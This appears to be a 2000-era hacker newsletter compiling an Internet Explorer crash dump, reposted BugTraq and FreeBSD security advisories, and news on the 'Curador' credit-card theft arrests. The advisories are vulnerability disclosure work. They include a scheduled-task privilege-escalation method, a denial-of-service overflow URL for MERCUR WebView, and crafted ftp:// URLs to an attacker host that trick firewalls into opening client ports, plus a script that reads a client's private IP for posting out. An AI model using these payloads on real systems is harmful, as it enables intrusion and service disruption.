FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name
0084ff90 77e15a1d 77e160f7 00074a30 0084ffec ffffffff
ntdll!ZwReplyWaitReceivePort
00003a98 00000000 00000000 00000000 00000000 00000000 rpcrt4!NdrOleAllocate
State Dump for Thread Id 0xee
eax=77b20000 ebx=00000000 ecx=0008a2e8 edx=00000000 esi=0126ff7c
edi=0008a2ec
eip=77f6791f esp=0126ff68 ebp=0126ff84 iopl=0 nv up ei pl nz na pe
nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000
efl=00000202
function: NtDelayExecution
77f67914 b827000000 mov eax,0x27
77f67919 8d542404 lea edx,[esp+0x4]
ss:0249e96f=????????
77f6791d cd2e int 2e
77f6791f c20800 ret 0x8
77f67922 8bc0 mov eax,eax
*----> Stack Back Trace <----*
FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name
0126ff84 77f1cebe 0000ea60 00000000 77b489f4 0000ea60 ntdll!NtDelayExecution
0126ffec 00000000 77b4f66d 0008a2e8 00000000 00000000 kernel32!Sleep
00000000 00000000 00000000 00000000 00000000 00000000 iexplore!<nosymbols>
*----> Raw Stack Dump <----*
0126ff68 f5 ce f1 77 00 00 00 00 - 7c ff 26 01 e8 a2 08 00
...w....|.&.....
0126ff78 00 00 00 00 00 ba 3c dc - ff ff ff ff ec ff 26 01
......<.......&.
0126ff88 be ce f1 77 60 ea 00 00 - 00 00 00 00 f4 89 b4 77
...w`..........w
0126ff98 60 ea 00 00 e9 f5 b4 77 - 00 00 00 00 00 00 b2 77
`......w.......w
0126ffa8 e8 a2 08 00 e8 a2 08 00 - 87 f6 b4 77 18 00 14 02
...........w....
0126ffb8 40 d4 06 00 de 4e f0 77 - e8 a2 08 00 18 00 14 02
@....N.w........
0126ffc8 40 d4 06 00 e8 a2 08 00 - 40 d4 06 00 c4 ff 26 01
@.......@.....&.
0126ffd8 00 02 00 00 ff ff ff ff - 44 b9 f3 77 38 d2 f3 77
........D..w8..w
0126ffe8 00 00 00 00 00 00 00 00 - 00 00 00 00 6d f6 b4 77
............m..w
0126fff8 e8 a2 08 00 00 00 00 00 - 00 00 00 00 02 00 00 00
................
01270008 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
................
01270018 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
................
01270028 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
................
01270038 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
................
01270048 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
................
01270058 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
................
01270068 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
................
01270078 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
................
01270088 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
................
01270098 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
................
State Dump for Thread Id 0xec
eax=00000010 ebx=00000000 ecx=012c2200 edx=00000000 esi=000000a4
edi=016fff78
eip=77f682db esp=016fff5c ebp=016fff80 iopl=0 ov up ei pl nz na po
cy
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000
efl=00000a07
function: NtWaitForSingleObject
77f682d0 b8c5000000 mov eax,0xc5
77f682d5 8d542404 lea edx,[esp+0x4]
ss:0292e963=????????
77f682d9 cd2e int 2e
77f682db c20c00 ret 0xc
77f682de 8bc0 mov eax,eax
*----> Stack Back Trace <----*
FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name
016fff80 77f04f37 000000a4 000927c0 00000000 700dcbbc
ntdll!NtWaitForSingleObject
77f67610 4affc033 89257508 ff900c42 037d044a 520004c2
kernel32!WaitForSingleObject
*----> Raw Stack Dump <----*
016fff5c a0 cc f1 77 a4 00 00 00 - 00 00 00 00 78 ff 6f 01
...w........x.o.
016fff6c 00 00 00 00 10 24 2c 01 - 40 75 f6 77 00 44 5f 9a
.....$,.@u.w.D_.
016fff7c fe ff ff ff 10 76 f6 77 - 37 4f f0 77 a4 00 00 00
.....v.w7O.w....
016fff8c c0 27 09 00 00 00 00 00 - bc cb 0d 70 a4 00 00 00
.'.........p....
016fff9c c0 27 09 00 d4 2c f9 77 - 10 24 2c 01 ec ff 6f 01
.'...,.w.$,...o.
016fffac 10 24 2c 01 ed ca 0d 70 - 50 d3 f9 77 c7 ca 0d 70
.$,....pP..w...p
016fffbc de 4e f0 77 10 24 2c 01 - d4 2c f9 77 50 d3 f9 77
.N.w.$,..,.wP..w
016fffcc 10 24 2c 01 50 d3 f9 77 - c4 ff 6f 01 54 1a 06 00
.$,.P..w..o.T...
016fffdc ff ff ff ff 44 b9 f3 77 - 38 d2 f3 77 00 00 00 00
....D..w8..w....
016fffec 00 00 00 00 00 00 00 00 - be ca 0d 70 10 24 2c 01
...........p.$,.
016ffffc 00 00 00 00 4d 5a 90 00 - 03 00 00 00 04 00 00 00
....MZ..........
0170000c ff ff 00 00 b8 00 00 00 - 00 00 00 00 40 00 00 00
............@...
0170001c 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
................
0170002c 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
................
0170003c c0 00 00 00 0e 1f ba 0e - 00 b4 09 cd 21 b8 01 4c
............!..L
0170004c cd 21 54 68 69 73 20 70 - 72 6f 67 72 61 6d 20 63 .!This program
c
0170005c 61 6e 6e 6f 74 20 62 65 - 20 72 75 6e 20 69 6e 20 annot be run in
0170006c 44 4f 53 20 6d 6f 64 65 - 2e 0d 0d 0a 24 00 00 00 DOS
mode....$...
0170007c 00 00 00 00 63 c9 86 b7 - 27 a8 e8 e4 27 a8 e8 e4
....c...'...'...
0170008c 27 a8 e8 e4 27 a8 e9 e4 - cb a8 e8 e4 7e 8b fb e4
'...'.......~...
--[END]---------------------------------------------------------------------
---
Cheers,
|-+-||-+-|-+-|-+-|oOo-(NtWaK0)(Telco. Eng. Etc..)-oOo|-+-|-+-|-+-||-+-|
The only secure computer is one that's unplugged, locked in a
safe, and buried 20 feet under the ground in a secret location...
and i'm not even too sure about that one"--Dennis Huges, FBI.
|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-||-+-||-+-|
Live Well Do Good --:)
Cheers,
------|oOo-(NtWaK0)(Telco. Eng. InfoSec Senior, Etc..)-oOo|------
The only secure computer is one that's unplugged, locked in a
safe, and buried 20 feet under the ground in a secret location...
and i'm not even too sure about that one"--Dennis Huges, FBI.
-----------------------------------------------------------------
Live Well Do Good --:)
@HWA
104.0 HNS:Drive Mappings in Interactive Login
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
Posted @ March 15, 2000
Issue: Drive Mappings in Interactive Login affect Processes running
in context of Schedule User. Points indicating this is a bug/security
exploit and not by design (as somehave indicated to the author) ...
Drive Mappings in Interactive Login
Posted to BugTraq on March 15, 2000
Issue: Drive Mappings in Interactive Login affect Processes running
in context of Schedule User.
Points indicating this is a bug/security exploit and not by design (as
somehave indicated to me)
1. Drive mappings are individual to each user, as seen by their
location in the registry under HKCU\Network. This point alone
indicates a bug. Why should the *personal* drive mappings of an
interactive login session have *any* affect on a service running in a
different user context, in a supposedly secure environment? They
shouldn't, plain and simple.
2. KB Article Q130668 is the only article I could find which has any
relationship to this issue, but it deals with a "bug" when the drives
are mapped to Netware Volumes using GSNW. However, reading
between the lines, one can see that the behavior described (which is
identical in both Netware and NT drive mappings) is not by design,
otherwise, why would they state this: Microsoft has confirmed this
to be a problem in Windows NT Workstation and Server versions
3.5, 3.51, and 4.0... They do offer up a solution to one half of the
problem - that is when the scheduled process leaves a mapped
drive, which then affects any interactive processes by preventing the
use of this drive (unless appropriate permissions exist for the
interactive user). But they make no mention of the other half - that a
non- privileged user can affect the environment of the scheduled
process, which is often in a priviliged account context.
Take the following scenario:
A "secure" NT workstation is configured with scheduler running in a
user context that has specific elevated rights in order to perform
unattended administrative functions based on scripts that are stored
on a server. But one of the tasks performed in these scripts requires
a mapped drive letter; UNC paths won't work. So to be sure, the
scripts begins by mapping a drive letter to the shared network
resource containing the patches and updates placed there when
required. Often these patches are security fixes and the like, and
the scheduler dutifully applies them to some large number of
machines as directed in the script.
Here comes the exploit. If an interactive login is present, and the
same drive letter is already mapped by a user, the net use in the
scheduled script will fail, as will the required hotfix or update. Not a
pretty picture in a large LAN whose security and stability may rely
on timely installation of these updates. This is the simplest
"exploit".
Next we extend this a bit further: the user maps a drive letter in an
interactive login, and places in it a script with the same filename as
that called by the scheduled update, and makes sure the schedule
user has permissions to this file and network resource. All of this
could be performed by a non- privileged user. The schedule service
will now execute this script in the elevated user context, and the
script could be instructed to install a trojan, add the user to the local
Admin group, or whatever. The bottom line is that this design flaw
can be easily exploited to allow any user with interactive login rights
to a workstation to elevate himself to the rights of the schedule user,
which is often Administrator of the workstation.
I have tested this on NT4 SP5 and 6a. (Note this is without IE5
installed, just the built in AT scheduler). I have also tested this with
all combinations of Local and Domain accounts for both the
scheduler and the interactive user. I have tested it with and without
persistent drive mappings present for either user - in each case,
whoever gets the login first gets the drive letter.
@HWA
105.0 HNS:DoS Attack in MERCUR WebView
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
Posted @ March 15, 2000
UssrLabs found a buffer overflow in MERCUR WebView
WebMail-Client 1.0where they do not use proper bounds checking in
the code who handle the GETcommands The following all result in a
Denial of Service against the service in question. ...
DoS Attack in MERCUR WebView
Posted to BugTraq on March 15, 2000
USSR Advisory Code: USSR-2000036
Release Date:
March 16, 2000
Systems Affected:
MERCUR WebMail-Client Version 1.0 port (1080)
THE PROBLEM
UssrLabs found a buffer overflow in MERCUR WebView
WebMail-Client 1.0where they do not use proper bounds checking in
the code who handle the GETcommands The following all result in a
Denial of Service against the servicein question.
Example:
http://hostip:1080/mmain.html&mail_user=(buffer)
Where [buffer] is aprox. 1000 characters. (0)
Binary or source for this Exploit:
http://www.ussrback.com/
Exploit:
the Exploit, crash the remote machine service WebMail
Vendor Status:
informed
Vendor Url:
http://www.atrium-software.com
Program Url:
http://www.atrium-software.com/mercur/webview_e.html
Credit: USSRLABS
SOLUTION
Noting yet.
@HWA
106.0 HNS:Problem with Firewall-1
~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
Posted @ March 15, 2000
The Dartmouth Collage security group has uncovered a problem
withFirewall-1 which could lead to the protected site handing out
more IPaddress info than intended. ..
Problem with Firewall-1
Posted to BugTraq on March 15, 2000
The Dartmouth Collage security group has uncovered a problem
withFirewall-1 which could lead to the protected site handing out
more IPaddress info than intended.
Under certain nominal load conditions (CPU less than 40%, 200+
activesessions) Firewall-1 will begin "leaking" packets with their
privateaddress information in tact. The result is that the receiving
site willreceive a SYN=1 that it will be unable to respond to. Once
the clientattempts a resend, the target network (or anyone in the
middle) can usethe source port information to enumerate the client's
true IP address.
Here is a Snort trace which has been sanitized and formatted for
easierviewing:
Mar 9 14:01:19 172.30.1.10:1721 -> 192.168.1.5:80 SYN **S*****
Mar 9 14:01:48 200.200.200.5:1721 -> 192.168.1.5:80 SYN **S*****
Mar 9 14:04:35 172.30.1.10:1858 -> 192.168.1.5:80 SYN **S*****
Mar 9 14:05:05 200.200.200.5:1858 -> 192.168.1.5:80 SYN **S*****
Mar 9 14:23:25 172.16.5.20:4868 -> 192.168.1.5:80 SYN **S*****
Mar 9 14:23:51 200.200.200.5:4868 -> 192.168.1.5:80 SYN **S*****
So the first packet goes out with the private address information
stillin place and SYN=1. When the client does not receive a reply,
itretransmits the SYN=1. Since FW-1 considers this to be part of
the samesession, the same source port number is assigned. If the
second packetgets translated properly (as in these traces) the
source port info canpotentially be used to map the legal IP address
to the private address.
Of course the problem here is that a would be bad guy now knows
theclient's true IP address. If enough hosts are recorded, its
possiblethat most of the internal network address space could be
enumerated.
This problem has been noted on Firewall-1 versions 3.0b & 4.0. 4.1
hasnot been checked but its expected that the same problem may
exist. Wewhere able to reproduce the problem on a Nokia IP440 and
NT. I've seenthis problem on Solaris 2.6 as well, but do not have the
data to back upthe statement.
A quick fix is to apply egress filtering to the border router and
blockall private addressing that attempts to leak though. A how-to
on egresscan be found at:
http://www.sans.org/y2k/egress.htm
Cheers all,
Chris
@HWA.
107.0 HNS:Freeze Distribution of IE 5.0, 5.0a, and 5.0b
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
Posted @ March 15, 2000
Microsoft has just discovered a serious problem when a user
attempts toinstall the 128-bit security patch for Internet Explorer 5.0,
5.0a and5.0b on Windows 2000 as part of an IE5.0 IEAK package.
After restartingthe system, users will not be able to logon to
Windows 2000 ...
Freeze Distribution of IE 5.0, 5.0a, and 5.0b
Posted to BugTraq on March 15, 2000
Microsoft has just discovered a serious problem when a user
attempts toinstall the 128-bit security patch for Internet Explorer 5.0,
5.0a and5.0b on Windows 2000 as part of an IE5.0 IEAK package.
After restartingthe system, users will not be able to logon to
Windows 2000.
The instructions to incorporate the 128-bit security patch into
IEAKpackages say you should use the command line switches:
"/q:a /r:n /n:v"
The /n:v switch when used with ie5dom.exe (the 128-bit security
patch for5.0x) causes important security files on Windows 2000 to
be replaced witholder files, preventing users from logging on.
Installations created using IEAK 5.0 for Windows 95, Windows 98,
andWindows NT4 systems with the ie5dom.exe, and these
command line parametersspecified, are not affected.
It is critical that you freeze distribution of IE 5.0, 5.0a or 5.0b
buildsthat incorporate the 128-bit security patch with these
switches. Pleasetake immediate action to help prevent more
customers from encounteringthis issue.
Please checkhttp://www.microsoft.com/windows/ieak/en/support
/faq/default.asp andMicrosoft Knowledge Base (KB) article Q255669
for updates to this issue.
Note: It may take 24 hours from the original issuance of this bulletin
forthe Microsoft Knowledge Base (KB) article related to this issue to
bevisible.
We sincerely apologize for this inconvenience and thank you in
advance foryour help in protecting end users.
Thank you, The IEAK Product Team
Checking to see if you have included this command-line switch:
To check a package for this issue:
Open your IEAK package in the IEAK Wizard and go to the Custom
Componentsscreen. Examine each custom component. If you have
included ie5dom.exe asa custom component, check the command
line switches for '/R:N /Q:A /N:V'
*OR*
If you don't have the IEAK Wizard available to you:
1) Extract your custom IE 5.0x package by running this command
line:'ie5setup.exe /c /t:'
2) Browse to the directory. Open 'iesetup.cif' in Notepad.
3) Look for a section like this:
[CUSTOM0]
SectionType=Component
DisplayName='128-bit Security'
URL1='Ie5dom.exe',2
GUID=128PATCH
Command1='Ie5dom.exe'
Switches1='/R:N /Q:A /N:V'
Type1=2
UninstallKey=''
Version=
Size=216
Platform=win95,win98,nt4,nt5,
Modes='0,1,2'
Details='128-bit Securiy'
Group=CustItems
Priority=500
UIVisible=0
4) Examine for:
Switches1='/R:N /Q:A /N:V'
If you have this switch listed, immediately freeze distribution of
thispackage!!!
@HWA
108.0 HNS:Extending the FTP "ALG" vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
Posted @ March 15, 2000
It is possible to cause many firewalls to open arbitrary ports allowing
external hosts to connect to "protected" clients. In this case, it is
done by fooling the protected client into sending a specially crafted
FTP request through the firewall, which it misinterprets as a
legitimate FTP "PORT" command ...
Extending the FTP "ALG" vulnerability
Posted to BugTraq on March 15, 2000
Author: Mikael Olsson, EnterNet Sweden
mikael.olsson@enternet.se
Original Date: 2000-03-10
Originally posted to: Bugtraq, Vuln-dev (BID 1045)
Vendor contacted: Nope, sorry, too many.
Updated: 2000-03-14
- Added browser-specific info
- Begun writing a list of firewalls expected to be vulnerable
- Rewrote a couple of paragraphs that were causing much head
scratching
Synopsis
It is possible to cause many firewalls to open arbitrary ports allowing
external hosts to connect to "protected" clients.
In this case, it is done by fooling the protected client into sending a
specially crafted FTP request through the firewall, which it
misinterprets as a legitimate FTP "PORT" command.
Basic idea : how to open arbitrary ports against a client
* Send a HTML email to an HTML-enabled mail reader containing
the tag
You could also conceivably plant a web page somewhere on a
server containing this link. Please reference CERT advisory
CA-2000-02: Malicious HTML Tags Embedded in Client Web
Requests http://www.cert.org/advisories/CA-2000-02.html
* Balance the number of A so that the PORT command will begin on
a new packet boundary. This may also be done by having the server
use a low TCP MSS to decrease the number of A's that one has to
add.
* The firewall in question will incorrectly parse the resulting RETR
/aaaaaaaa[....]aaaaaPORT 1,2,3,4,0,139 as first a RETR command
and then a PORT command and open port 139 against your address
(1.2.3.4 in this case)
* Now the server ftp.rooted.com can connect to the client on port
139. Ouch.
Before you ask:
No, it does not have to be port 139. It can be any port. Some
firewalls disallow "known server ports" for these connections; such
ports cannot be used, but I'm betting there are plenty other ports
that can be used in such cases.
Address translation playing games
You have to know the IP address of the client in order to fool the
firewall into opening the port.
If the client is not dynamically NATed, this is easy.
If the client IS dynamically NATed, this is a bit harder.
How to make it work through address translation
There are several ways to figure out what the private address is.
Here's two:
* Send an email to the address in question containing an img src
ftp://ftp.rooted.com:23456 and hope that the firewall won't realise
that port 23456 is FTP. PORT commands won't be translated this
way, so the private IP adress will be exposed. This assumes that
23456 is allowed through the firewall and that it won't attempt to
parse FTP command data on that port.
* Send an email with a link to a web page that contains javascript
that extracts the private IP address and posts it to the server.
The javascript code below works on Netscape; I don't know what the
equivalent is for MSIE.
vartool=java.awt.Toolkit.getDefaultToolkit();
addr=java.net.InetAddress.getLocalHost();
ip=addr.getHostAddress();
Once we know about the IP address, we can adjust the img src so
that it is valid for that specific internal client.
The dynamic translation will also likely change the port number
opened on the NAT:ed public address, but that's ok. All we have to
do is have our fake FTP server read the command packet containing
the PORT command, as changed by the firewall, and we'll know
what public address and port to connect to in order to get to our
desired port on the "protected" client.
I think I've heard about reverse firewall penetration before
Yeah, the idea of internal users fooling a firewall to let them out isn't
new, but the scope of this vulnerability is "new" IMHO.
Basically, you can get at anyone with a browser or HTML-enabled
mail reader protected by firewalls that have more than 50% market
coverage. That's bad.
What about Checkpoint's FTP PASV fix for FW-1?
Checkpoint's fix for FW-1 is to make sure that every packet in the
command stream ends with CRLF (0x0a 0x0d in hex). That would
help against the above attack, but not if we modify it a wee bit:
src="ftp://ftp.rooted.com/aaaaaaa%0a%0dPORT 1,2,3,4,0,139"
Ouch. This WILL work in Netscape v4.7 (I've verified it using a
network sniffer, anyone care for a packet dump?).
The firewall will see this as two separate commands: RETR
aaaaaaaaaa PORT 1,2,3,4,0,139
which means that poorly implemented proxies are likely to be
vulnerable aswell.
This in and of itself is a browser bug IMHO. Line feeds are not valid
characters in a file name.
Added: 2000-03-14
Apparently, this CRLF variant will _not_ work in MSIE (version
unknown?). It's doing the right thing: stripping out the CRLF.
(Second hand info, I have not verified MSIE's behaviour)
No information on other browsers or mail readers.
Other fixes?
I havent seen other firewall vendors make public claims that they
protect against any of these attacks. Cisco is apparently working on
a fix for PIX, but it's taking time, so I'm guessing they're doing it the
right way - since doing it the right way really does take quite a bit of
time.
It would seem like all the others are silently going to sneak fixes into
their upcoming updates and pretend like they never were vulnerable
in the first place. Grumble.
Added: 2000-03-14
I suspect that FW-1's security servers may disable this attack.
(Dunno, I'm not an FW-1 user)
What firewalls are likely to be vulnerable?
This specific attack is likely to work against most "stateful
inspection" firewalls with poorly implemented application layer filters.
This probably includes most products out there.
It may also affect poorly implemented "proxies" when the CRLF is
added before the PORT command as described above.
Added: 2000-03-14
Checkpoint FW-1 v3 is likely to allow connections on most ports
1024-65535 with full bidirectional communication
Checkpoint FW-1 v4 is likely to allow connection on most ports
1024-65535 with only unidirectional communication
Cisco PIX is likely to allow connections to any port with full
bidirectional communication
Linux's ip_masq_ftp module is _really_ easy to fool, according to
Solar Designer. It will accept a "PORT" command anywhere in a
packet. This means that even this is likely to work:
"http://rooted.com:21/PORT 1,2,3,4,0,139"
This is likely NOT a complete list. And no, I'm not going to get in
touch with vendors and report the vulnerability. There are just too
many that are likely to be affected.
"The great picture"
Other protocols than FTP are likely to be affected by this type of
vulnerability - pretty much any protocol that opens up ephereal ports
after the initial command session. A couple that come to mind are:
* Oracle SQL*Net (versions using separate data channels)
* RealAudio/Video (secondary UDP channel)
* H.323 (NetMeeting et al)
THIS IS NOT A COMPLETE LIST. Those were just a couple of
common ones off the top of my head.
Workarounds to this specific vulnerability
* Disable active FTP. Errrr, wait. The fix for the server side
vulnerability was to disable passive FTP. Let's rephrase that:
* Disable FTP altogether. Block port 21. Disable FTP Application
Layer Filters on all ports in your firewall.
* If you can't change the settings in your firewall, set the "FTP
Proxy" setting in your browser/HTML-enabled mail reader to some
address that doesn't exist, like 127.0.0.2. After this change, your
browser won't be able to connect anywhere using FTP.
(From Solar Designer: This does not help if you're using
ip_masq_ftp, since it'll be fooled by HTTP looking like FTP.)
@HWA
109.0 FreeBSD-SA-00:08: Lynx overflows
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Submitted by FProphet
Source: Bugtraq
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: bugtraq@securityfocus.com
Date: Wed, 15 Mar 2000 09:34:43 -0800
Reply-To: security-officer@freebsd.org
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
Comments: RFC822 error: <W> FROM field duplicated. Last occurrence was
retained.
From: FreeBSD Security Officer <security-officer@freebsd.org>
Subject: FreeBSD Security Advisory: FreeBSD-SA-00:08.lynx
To: BUGTRAQ@SECURITYFOCUS.COM
-----BEGIN PGP SIGNED MESSAGE-----
=============================================================================
FreeBSD-SA-00:08 Security Advisory
FreeBSD, Inc.
Topic: Lynx ports contain numerous buffer overflows
Category: ports
Module: lynx/lynx-current/lynx-ssl/ja-lynx/ja-lynx-current
Announced: 2000-03-15
Affects: Ports collection before the correction date.
Corrected: See below.
FreeBSD only: NO
I. Background
Lynx is a popular text-mode WWW browser, available in several versions
including SSL support and Japanese language localization.
II. Problem Description
The lynx software is written in a very insecure style and contains numerous
potential and several proven security vulnerabilities (publicized on the
BugTraq mailing list) exploitable by a malicious server.
The lynx ports are not installed by default, nor are they "part of FreeBSD"
as such: they are part of the FreeBSD ports collection, which contains over
3100 third-party applications in a ready-to-install format.
FreeBSD makes no claim about the security of these third-party
applications, although an effort is underway to provide a security audit
of the most security-critical ports.
III. Impact
A malicious server which is visited by a user with the lynx browser can
exploit the browser security holes in order to execute arbitrary code as
the local user.
If you have not chosen to install any of the
lynx/lynx-current/lynx-ssl/ja-lynx/ja-lynx-current ports/packages, then
your system is not vulnerable.
IV. Workaround
Remove the lynx/lynx-current/lynx-ssl/ja-lynx/ja-lynx-current ports, if you
you have installed them.
V. Solution
Unfortunately, there is no simple fix to the security problems with the
lynx code: it will require a full review by the lynx development team and
recoding of the affected sections with a more security-conscious attitude.
In the meantime, there are two other text-mode WWW browsers available in
FreeBSD ports: www/w3m (also available in www/w3m-ssl for an SSL-enabled
version, and japanese/w3m for Japanese-localization) and www/links.
Note that the FreeBSD Security Officer does not make any recommendation
about the security of these two browsers - in particular, they both appear
to contain potential security risks, and a full audit has not been
performed, but at present no proven security holes are known. User beware -
please watch for future security advisories which will publicize any such
vulnerabilities discovered in these ports.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
iQCVAwUBOM/JklUuHi5z0oilAQEbzQP+K5HbTRk40fmb+pKOcUDD/r4ofcrkWtXn
Ya7PT/ALXvUnohm/jqKofNk9cXK1EspbgHb9N1OJZEzcYUAy378WpQgWh4uxKQa7
+541CwFPPIbWfJQJCOaUODN2qwnXdqXMj6noCKRMN0c3tBRG6R2zEfVaM1vMNS1+
+vcp5WAqDu4=
=dtMU
-----END PGP SIGNATURE-----
@HWA
110.0 Curador? BUSTED
~~~~~~~~~~~~~~~
Contributed by Abattis (Wired) and MerXor (MSNBC)
Follow-ups by Cruci. (MSNBC) more from HNN in section 119.0
-=-
Sources: Wired, MSNBC
http://www.wired.com/news/business/0,1367,35186,00.html
Alleged Hackers Arrested
Reuters
2:05 p.m. Mar. 24, 2000 PST
The FBI said Friday that two 18-year-olds had been arrested in Wales for
allegedly hacking into nine e-commerce websites around the world and
stealing credit card information.
The losses connected with the intrusions on websites in the United States,
Canada, Thailand, Japan, and Britain could exceed US$3 million, the FBI
said in a news release.
It said the theft of credit card information related to more than 26,000
accounts, the alleged scheme involved the disclosure of the data on the
Internet, and that the accused hackers used the screen name "Curador."
The two youths, who cannot be identified under British law, were arrested
Thursday by the Dyfed-Powys Police Service in Wales for violating
Britain's Computer Misuse Act, the FBI said.
The arrests stemmed from an FBI investigation conducted with the Welsh
police, the Royal Canadian Mounted Police, and Internet security
consultants, the FBI said, adding that the international banking and
credit card industry also provided substantial cooperation.
The FBI still is investigating last month's wave of cyber attacks that
disrupted some of the Internet's most popular sites. The FBI has yet to
make any arrests or bring any charges involving those attacks.
The FBI's own website was attacked March 14, the same day the agency
celebrated the 50th anniversary of its "Ten Most Wanted Fugitives" list,
which is publicized on the site,
FBI officials said.
-=-
MSNBC;
http://www.msnbc.com/news/386402.asp
Consultant was key to �Curador� bust
The FBI crowed, but security specialist led police to Wales
By Mike Brunker
MSNBC
March 27 � While the FBI was quick to take credit
for the arrest last week of two teen-agers who
allegedly stole information on 26,000 credit cards
from Internet retailers, a Canadian computer
security consultant working with British
authorities tracked the suspects back to their small
village in Wales before the U.S. agency even got
involved, MSNBC.com has learned.
A PRESS RELEASE issued Friday by the FBI said the
arrests of the two 18-year-olds .came as a direct result of an
FBI investigation..
It added that unidentified Internet security consultants
had assisted in the case, but nowhere did it mention Chris
Davis of HeXedit Network Security Inc. of Ottawa, Ontario,
who worked for nearly two months assembling the evidence
that led authorities to the suspects.
In interviews with numerous news organizations,
including MSNBC.com, after the announcement, the FBI�s
Michael Vatis said the arrests should serve as a warning to
others who would use the Internet to steal.
.It�s important to say that anyone who underestimates
the skill of our agents ... does so at their own peril,. he said.
FBI PLAYED LIMITED ROLE
But interviews with Davis and other participants in the
case show that the FBI�s role in the investigation of
.Curador. was limited.
.They (the FBI) did get involved fairly late,. Davis said
Monday. .By the time they got involved, (British police) had
phone numbers, home addresses and all that..
Phone calls to the
National Infrastructure
Protection Center, which
Vatis heads, were not
returned Monday. A
spokesman for the FBI
declined to comment.
.In anything like this,
it really doesn�t serve any
purpose to go back and
try to heap credit one way
or the other,. said the
spokesman, Paul Bresson.
.I think the facts speak for
themselves..
But officials of Promobility.net, a wireless phone seller
in Ontario that was among the sites hit by .Curador,.
confirmed Davis� account.
.That is 100 percent accurate,. spokesman Eric Geiler
said. .He could have knocked on [the suspects�] doors two
weeks before the FBI did..
Davis, who has been a computer security consultant for
nearly four years, said he got involved in the case in early
February after reading a boastful post from .Curador. �
the online alias that authorities say was jointly used by the
two 18-year-old suspects � on HackerNews.com about
the theft of credit card information from two e-merchants.
The credit card information was subsequently posted on a
Web site by .Curador,. who said he took the action to
publicize the lack of security at many e-commerce sites.
�THAT�S PRETTY LOW�
.I read the boast and I thought, �That�s pretty low,�.
said Davis. .I checked and both sites seemed like fairly
small mom-and-pop type operations and I felt sorry for
them. So I fired off an e-mail and said and said, �I�ll help
you secure your site.� They wrote back and said they had
no idea they�d even been hit (by hackers)..
Both Promobility.net and Ltamedia.com, a Knoxville,
Tenn., seller of .life-enhancing products,. agreed to turn
over their computer logs to Davis so he could determine
how the intruders had gained entry to their systems and
close the security holes.
Looking through the logs, Davis discovered that the
intrusions were accomplished using two known security
holes in Microsoft�s Internet Information Server, or IIS.
While Microsoft had issued .patches. to correct the holes
months earlier, none of the nine Web sites in the United
States, Canada, Thailand, Japan and the United Kingdom
that were hit by .Curador. had updated their software to
eliminate the problem.
(Microsoft is a partner in MSNBC.com.)
While he could have simply fixed the flaws and
returned to his paying jobs, Davis found himself growing
increasingly fascinated by the case and pressed on.
By analyzing e-mail sent through a free service that the
hackers wrongly thought would shield the IP address, Davis
was quickly able to determine that .Curador. was using an
Internet service provider in England. He then contacted
Scotland Yard, which referred him to police in South
Yorkshire, who determined from records obtained from the
ISP that the .crackers. the term for computer criminals
preferred by law-abiding hackers were in Wales.
SEARCH NARROWS TO TWO HOUSES
Soon, the British investigators tightened the circle to the
tiny fishing village of Clynderwen, population 500, and
ultimately to two houses in the village.
It was then, Davis said, that he heard from the FBI,
which learned from the Royal Canadian Mounted Police
that he was working on the case while investigating the
thefts from U.S. Web sites.
.They were able to
quickly obtain logs from
everybody who had been
affected in the U.S.
and I explained how
�Curador� had broken in,
showing them, �Here�s the
line from the log, here�s
how he exploited the security vulnerability.�.
The FBI, working with the RCMP and the Welsh
Dyfed-Powys Police Service, orchestrated the arrests on
Thursday of the 18-year-old suspects. The teenagers were
questioned for 12 hours after their arrest before being
released on bail as the investigation continues, Welsh police
said Monday.
In accordance with British law, neither of the suspects
was publicly identified. But one, Raphael Gray, has given
numerous interviews since his release to say that he had
acted only to highlight the lack of security on many retail
Web sites.
.I have done the honest thing, but I have been
ignored,. he was quoted as saying by the Sunday Telegraph
of London. .That�s why I posted the information on the
Internet..
CURADOR�S CLAIMS
Authorities have not identified the nine e-commerce
sites they say were burgled, but according to .Curador�s.
Web sites others include Feelgood Falls; Sales Gate;
Shopping Thailand; Vision Computers; NTD Media and the
American Society of Clinical Pathologists.
Gray has maintained in interviews since his arrest that
neither he nor his friend had used the stolen credit card data
for personal gain � an assertion backed up by a British
businessman who said he hired Gray to run his e-commerce
site.
.I�d have to give him money to buy lunch or get a
haircut,. the businessman told MSNBC.com on Monday.
The businessman, who contacted MSNBC.com,
agreed to talk about Gray on the condition that neither he
nor his Web site be identified because he feared it would be
bad for business.
His account could not be independently confirmed, but
his description of Gray was consistent with other published
accounts.
